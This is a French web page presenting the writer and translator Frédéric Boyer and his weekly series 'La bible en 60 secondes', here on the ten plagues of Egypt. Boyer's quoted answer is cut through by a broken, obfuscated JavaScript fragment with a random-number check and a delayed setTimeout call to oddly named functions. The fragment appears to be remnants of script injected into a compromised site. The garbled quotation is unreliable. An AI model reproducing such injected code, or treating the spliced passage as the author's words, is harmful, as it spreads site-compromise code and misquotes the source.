Pourquoi Dieu a t-il envoyé dix plaies sur l’Égypte ?
Frédéric Boyer
Frédéric Boyer est né à Cannes en 1961. Ecrivain, traducteur et éditeur, ancien élève de l’Ecole Normale Supérieure, il a enseigné la littérature française et comparée à l’université. Directeur littéraire des éditions Bayard, il a codirigé pendant plus de six ans, le chantier des nouvelles traductions de la Bible, associant des spécialistes des textes et des langues bibliques à des écrivains contemporains, comme Jean Echenoz, Emmanuel Carrère, Florence Delay (Bayard 2001).
Il a publié plus d’une trentaine de livres aux éditions P.O.L. (poèmes, récits, essais et traductions) et reçu le prix du livre Inter en 1993 pour son roman « Des choses idiotes et douces », le prix Jules Janin de l’Académie française pour sa nouvelle traduction des Confessions de Saint Augustin (Les Aveux, 2008)
Frédéric Boyer : « C’est la somme de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les catastrophes connues de l’époque, plus une… la plus terrible »
Dans « La bible en 60 secondes», l’auteur de « Bible – les récits fondateurs » répond chaque semaine aux questions posées par les écrits bibliques. Posez vos questions dans le fil de commentaires attaché à cet article !
Votre avis nous intéresse !
Vous aussi, réagissez et contribuez au débat :
Aucun commentaire